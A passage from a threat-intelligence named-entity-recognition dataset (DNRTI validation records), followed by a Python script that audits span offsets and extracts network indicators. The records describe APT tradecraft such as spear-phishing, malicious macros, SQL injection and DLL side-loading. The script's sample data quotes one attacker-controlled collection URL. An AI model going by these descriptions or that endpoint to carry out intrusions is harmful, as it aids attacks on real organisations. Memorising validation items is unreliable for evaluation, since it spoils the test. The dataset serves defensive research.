"Organization: financial institutions": [[156, 178]], "Organization: journalists": [[181, 192]], "Organization: software developers": [[195, 214]]}, "info": {"id": "dnrti_valid_000635", "source": "dnrti_valid"}} {"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": {"Organization: financial sectors": [[105, 122]]}, "info": {"id": "dnrti_valid_000636", "source": "dnrti_valid"}} {"text": "Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": {"Organization: Oil sectors": [[189, 200]]}, "info": {"id": "dnrti_valid_000637", "source": "dnrti_valid"}} {"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry .", "spans": {}, "info": {"id": "dnrti_valid_000638", "source": "dnrti_valid"}} {"text": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": {}, "info": {"id": "dnrti_valid_000639", "source": "dnrti_valid"}} {"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": {}, "info": {"id": "dnrti_valid_000640", "source": "dnrti_valid"}} {"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia .", "spans": {}, "info": {"id": "dnrti_valid_000641", "source": "dnrti_valid"}} {"text": "These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities 
, Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {}, "info": {"id": "dnrti_valid_000642", "source": "dnrti_valid"}} {"text": "Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {}, "info": {"id": "dnrti_valid_000643", "source": "dnrti_valid"}} {"text": "Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system .", "spans": {}, "info": {"id": "dnrti_valid_000645", "source": "dnrti_valid"}} {"text": "These VNC executables would either be included in the SFX file or downloaded by the batch script .", "spans": {}, "info": {"id": "dnrti_valid_000646", "source": "dnrti_valid"}} {"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": {}, "info": {"id": "dnrti_valid_000647", "source": "dnrti_valid"}} {"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": {}, "info": {"id": "dnrti_valid_000648", "source": "dnrti_valid"}} {"text": "Gorgon Group used common URL shortening services to download payloads .", "spans": {}, "info": {"id": "dnrti_valid_000649", "source": "dnrti_valid"}} {"text": "Gorgon used numerous decoy documents and 
phishing emails ; both styles of attack lacked overall sophistication .", "spans": {}, "info": {"id": "dnrti_valid_000650", "source": "dnrti_valid"}} {"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics .", "spans": {"Malware: malicious Word documents": [[159, 183]]}, "info": {"id": "dnrti_valid_000652", "source": "dnrti_valid"}} {"text": "All contain the same Visual Basic macro code and author name as Honeybee .", "spans": {}, "info": {"id": "dnrti_valid_000653", "source": "dnrti_valid"}} {"text": "Ke3chang attackers have used spear-phishing emails .", "spans": {}, "info": {"id": "dnrti_valid_000654", "source": "dnrti_valid"}} {"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": {}, "info": {"id": "dnrti_valid_000655", "source": "dnrti_valid"}} {"text": "DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": {}, "info": {"id": "dnrti_valid_000656", "source": "dnrti_valid"}} {"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"Organization: Bitcoin users": [[129, 142]], "Organization: financial organizations": [[154, 177]]}, "info": {"id": "dnrti_valid_000657", "source": "dnrti_valid"}} {"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": {"Organization: financial organizations": [[129, 152]]}, "info": {"id": "dnrti_valid_000658", "source": "dnrti_valid"}} {"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails 
impersonating job recruiters which contained malicious documents .", "spans": {"Organization: job recruiters": [[108, 122]]}, "info": {"id": "dnrti_valid_000659", "source": "dnrti_valid"}} {"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": {}, "info": {"id": "dnrti_valid_000660", "source": "dnrti_valid"}} {"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": {}, "info": {"id": "dnrti_valid_000661", "source": "dnrti_valid"}}
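The records above are stored as character-offset NER spans over tokenized report sentences, with several JSON objects run together on one line. As an added example (not part of the corpus, and not tooling from any of the reports it quotes), the following Python audit parses that layout, verifies that each span's offsets really select the surface string named in its label (the "Type: surface" convention used throughout), and pulls the network indicators that a few records carry, such as the WannaCry hard-coded IPs and the jquerycodedownload.live collection endpoint. The three sample records are copied from this page; the IPv4/host regexes and the file-extension filter are heuristics of mine, not the dataset's own code.

```python
import json
import re

# Constructed input: three records copied from this page, concatenated on one
# line the way the corpus stores them (several JSON objects per line).
SAMPLE_LINE = " ".join([
    '{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"Malware: attachment": [[35, 45]], "Malware: DLL side-loading": [[99, 115]]}, "info": {"id": "dnrti_valid_000608", "source": "dnrti_valid"}}',
    '{"text": "The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” .", "spans": {"Malware: JavaScript": [[4, 14]]}, "info": {"id": "dnrti_valid_000627", "source": "dnrti_valid"}}',
    '{"text": "Notably , after the first SMB packet sent to the victim \'s IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": {}, "info": {"id": "dnrti_valid_000661", "source": "dnrti_valid"}}',
])

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Host with optional path; the closing curly quote seen in the corpus ends a path.
HOST = re.compile(r"\b(?P<host>(?:[a-z0-9-]+\.)+[a-z]{2,})(?P<path>/[^\s\"”]*)?", re.I)
# Heuristic filter (my assumption): dotted tokens ending in these are filenames
# such as wuaupdt.exe elsewhere in the corpus, not hostnames.
FILE_EXTS = {"exe", "dll", "lnk", "wsc", "xlsm", "aspx", "js", "vbs", "bat", "ps1"}


def iter_records(line):
    """Yield each JSON object from a line holding several concatenated objects."""
    dec = json.JSONDecoder()
    pos = 0
    while True:
        while pos < len(line) and line[pos].isspace():
            pos += 1
        if pos >= len(line):
            return
        obj, end = dec.raw_decode(line, pos)
        yield obj
        pos = end


def check_spans(rec):
    """Return (label, (start, end), actual_text) for every span whose offsets
    do not select the surface string after 'Type: ' in its label."""
    text = rec["text"]
    bad = []
    for label, ranges in rec["spans"].items():
        _etype, _, surface = label.partition(": ")
        for start, end in ranges:
            found = text[start:end]
            if found != surface:
                bad.append((label, (start, end), found))
    return bad


def extract_iocs(rec):
    """Pull IPv4 literals and host/URL-looking tokens out of a record's text.
    Heuristic only; hosts whose last label is a file extension are dropped."""
    text = rec["text"]
    hosts = []
    for m in HOST.finditer(text):
        tld = m.group("host").rsplit(".", 1)[-1].lower()
        if tld not in FILE_EXTS:
            hosts.append(m.group(0))
    return {"ips": IPV4.findall(text), "hosts": hosts}


def audit(line):
    """Run the span check and IOC extraction over every record on the line,
    keyed by the record id from its 'info' block."""
    report = {}
    for rec in iter_records(line):
        rid = rec["info"]["id"]
        report[rid] = {"bad_spans": check_spans(rec), "iocs": extract_iocs(rec)}
    return report


if __name__ == "__main__":
    for rid, result in audit(SAMPLE_LINE).items():
        print(rid, result)
```

Run it over a real corpus file line by line; any non-empty `bad_spans` means the text was edited after annotation (a typo fix that shifted offsets, for instance) and the span needs re-aligning before the record is used for training or evaluation.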